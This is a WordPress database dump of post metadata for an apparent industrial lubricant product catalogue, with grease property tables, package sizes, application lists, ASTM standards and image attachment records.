INSERT INTO `wp_postmeta` VALUES (6203, 717, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Property</td>\r\n<td style="text-align: center;" width="224">AUT Series</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °C</td>\r\n<td style="text-align: center;">(-44-200)</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range °F</td>\r\n<td style="text-align: center;">(-46-392)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @20°C cSt</td>\r\n<td style="text-align: center;">310</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @40°C cSt</td>\r\n<td style="text-align: center;">100</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity @100°C cSt</td>\r\n<td style="text-align: center;">12.5</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2 g/cm</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6204, 717, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (6205, 717, '318_custom_list_file', 'a:1:{s:32:"2d17dd6fef7dbeedc1eeead1ddfc8b5b";a:3:{s:4:"name";s:14:"Automotive PDF";s:4:"file";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (6206, 717, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (6207, 717, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6208, 717, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6209, 717, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (6210, 717, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6211, 717, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (6212, 717, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (6213, 717, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (6214, 717, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (6215, 717, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6216, 717, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6217, 717, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6218, 717, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (6219, 717, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (6220, 717, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (6221, 717, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (6222, 717, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6223, 717, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6224, 717, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (6225, 717, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6226, 717, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (6227, 717, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (6228, 717, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6229, 717, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6230, 717, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (6231, 717, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (6232, 717, '_product_image_gallery', '380,379,378,377,376,375,374'); 
INSERT INTO `wp_postmeta` VALUES (6262, 718, '_wp_attached_file', '2016/08/shutterstock_97401731.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6263, 718, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:3510;s:4:"file";s:33:"2016/08/shutterstock_97401731.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_97401731-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_97401731-800x468.jpg";s:5:"width";i:800;s:6:"height";i:468;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_97401731-768x449.jpg";s:5:"width";i:768;s:6:"height";i:449;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"shutterstock_97401731-1600x936.jpg";s:5:"width";i:1600;s:6:"height";i:936;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_97401731-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_97401731-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_97401731-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_97401731-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6264, 717, '_thumbnail_id', '718'); 
INSERT INTO `wp_postmeta` VALUES (6265, 717, '716_default_editor', '<ul>\r\n 	<li>Noise, Vibration, Harshness (NVH) Elimination</li>\r\n 	<li>Squeak &amp; Rattle Elimination</li>\r\n 	<li>Alternator</li>\r\n 	<li>Cooling System Thermostat</li>\r\n 	<li>Cooling Fan</li>\r\n 	<li>EGR Valve</li>\r\n 	<li>Spark Plug Boots</li>\r\n 	<li>Electric Motor</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6266, 717, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (6267, 717, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (6268, 717, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6269, 719, '_edit_lock', '1474982871:2'); 
INSERT INTO `wp_postmeta` VALUES (6270, 719, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (6271, 719, '_ywtm_tab_type', 'global'); 
INSERT INTO `wp_postmeta` VALUES (6272, 719, '_ywtm_show_tab', '1'); 
INSERT INTO `wp_postmeta` VALUES (6273, 719, '_ywtm_order_tab', '3'); 
INSERT INTO `wp_postmeta` VALUES (6274, 719, '_ywtm_icon_tab', 'a:3:{s:6:"select";s:4:"icon";s:4:"icon";s:23:"FontAwesome:thumbs-o-up";s:6:"custom";s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (6275, 719, '_ywtm_layout_type', 'default'); 
INSERT INTO `wp_postmeta` VALUES (6276, 719, '_ywtm_enable_custom_content', '0'); 
INSERT INTO `wp_postmeta` VALUES (6277, 719, '_ywtm_gallery_columns', '1'); 
INSERT INTO `wp_postmeta` VALUES (6278, 719, '_ywtm_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (6279, 719, '_ywtm_video', 'a:1:{s:7:"columns";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (6280, 719, '_ywtm_google_map_full_width', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (6281, 719, '_ywtm_google_map_width', '100'); 
INSERT INTO `wp_postmeta` VALUES (6282, 719, '_ywtm_google_map_height', '100'); 
INSERT INTO `wp_postmeta` VALUES (6283, 719, '_ywtm_google_map_overlay_address', ''); 
INSERT INTO `wp_postmeta` VALUES (6284, 719, '_ywtm_google_map_overlay_zoom', '15'); 
INSERT INTO `wp_postmeta` VALUES (6285, 719, '_ywtm_text_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (6286, 719, '_ywtm_shortcode_tab', ''); 
INSERT INTO `wp_postmeta` VALUES (6287, 717, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2270</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D3336</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>ASTM D1478</li>\r\n 	<li>ASTM D6138</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D4048</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6288, 715, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6289, 715, '716_default_editor', '<ul>\r\n 	<li>Noise, Vibration, Harshness (NVH) Elimination</li>\r\n 	<li>Squeak &amp; Rattle Elimination</li>\r\n 	<li>Alternator</li>\r\n 	<li>Cooling System Thermostat</li>\r\n 	<li>Cooling Fan</li>\r\n 	<li>EGR Valve</li>\r\n 	<li>Spark Plug Boots</li>\r\n 	<li>Electric Motor</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6290, 715, '719_default_editor', '<ul>\r\n 	<li>ISO 100</li>\r\n 	<li>ASTM D3336</li>\r\n</ul>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (6291, 714, '716_default_editor', '<ul>\r\n 	<li>Noise, Vibration, Harshness (NVH) Elimination</li>\r\n 	<li>Squeak &amp; Rattle Elimination</li>\r\n 	<li>Alternator</li>\r\n 	<li>Cooling System Thermostat</li>\r\n 	<li>Cooling Fan</li>\r\n 	<li>EGR Valve</li>\r\n 	<li>Spark Plug Boots</li>\r\n 	<li>Electric Motor</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6292, 714, '719_default_editor', '<ul>\r\n 	<li>ISO 100</li>\r\n 	<li>ASTM D3336</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6293, 713, '716_default_editor', '<ul>\r\n 	<li>Noise, Vibration, Harshness (NVH) Elimination</li>\r\n 	<li>Squeak &amp; Rattle Elimination</li>\r\n 	<li>Alternator</li>\r\n 	<li>Cooling System Thermostat</li>\r\n 	<li>Cooling Fan</li>\r\n 	<li>EGR Valve</li>\r\n 	<li>Spark Plug Boots</li>\r\n 	<li>Electric Motor</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6294, 713, '719_default_editor', '<ul>\r\n 	<li>ISO 100</li>\r\n 	<li>ASTM D3336</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6295, 672, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6296, 672, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6297, 672, '719_default_editor', '<ul>\r\n 	<li>NSF H-1</li>\r\n 	<li>ASTM D1743</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6298, 672, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6299, 672, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (6300, 672, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (6301, 672, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (6302, 672, '_ywtm_content_tab_description', '<ul>\r\n 	<li>NSF H-1</li>\r\n 	<li>ASTM D1743</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6303, 674, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6304, 674, '719_default_editor', '<ul>\r\n 	<li>NSF H-1</li>\r\n 	<li>ASTM D1743</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6305, 675, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6306, 675, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6307, 696, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6308, 696, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6309, 697, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6310, 697, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6311, 659, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6312, 659, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6313, 671, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Paint plant conveyor bearings</li>\r\n 	<li>Corrugator and paper machine bearings</li>\r\n 	<li>Aluminum can manufacturing bearings</li>\r\n 	<li>Welding machines</li>\r\n 	<li>High temperature fans</li>\r\n 	<li>Textile equipment</li>\r\n 	<li>Tenter frames</li>\r\n 	<li>High temperature ovens</li>\r\n 	<li>Conveyor systems in glass and aluminum plants</li>\r\n 	<li>Textile calender roll bearings</li>\r\n 	<li>Brick kiln car bearings</li>\r\n 	<li>Valve lubrication</li>\r\n 	<li>Ventilation fan bearing grease</li>\r\n 	<li>Rod mills</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6314, 671, '719_default_editor', '<ul>\r\n 	<li>NSF H-1</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6317, 722, '_wp_attached_file', '2016/08/shutterstock_292901249.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6318, 722, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3456;s:6:"height";i:2304;s:4:"file";s:34:"2016/08/shutterstock_292901249.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_292901249-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_292901249-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_292901249-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_292901249-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_292901249-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_292901249-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_292901249-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_292901249-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6319, 723, '_wp_attached_file', '2016/08/shutterstock_340828220.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6320, 723, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:34:"2016/08/shutterstock_340828220.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_340828220-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_340828220-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_340828220-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_340828220-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_340828220-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_340828220-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_340828220-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_340828220-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6321, 724, '_wp_attached_file', '2016/08/shutterstock_361063190.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6322, 724, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3416;s:6:"height";i:2237;s:4:"file";s:34:"2016/08/shutterstock_361063190.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_361063190-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_361063190-800x524.jpg";s:5:"width";i:800;s:6:"height";i:524;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_361063190-768x503.jpg";s:5:"width";i:768;s:6:"height";i:503;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_361063190-1600x1048.jpg";s:5:"width";i:1600;s:6:"height";i:1048;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_361063190-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_361063190-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_361063190-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_361063190-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6323, 674, '_thumbnail_id', '722'); 
INSERT INTO `wp_postmeta` VALUES (6324, 672, '_thumbnail_id', '723'); 
INSERT INTO `wp_postmeta` VALUES (6325, 675, '_thumbnail_id', '724'); 
INSERT INTO `wp_postmeta` VALUES (6326, 649, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6327, 725, '_wp_attached_file', '2016/08/shutterstock_68906731.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6328, 725, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3006;s:6:"height";i:2000;s:4:"file";s:33:"2016/08/shutterstock_68906731.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_68906731-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_68906731-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_68906731-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_68906731-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_68906731-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_68906731-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_68906731-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_68906731-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6329, 726, '_wp_attached_file', '2016/08/shutterstock_105938183.jpg'); 
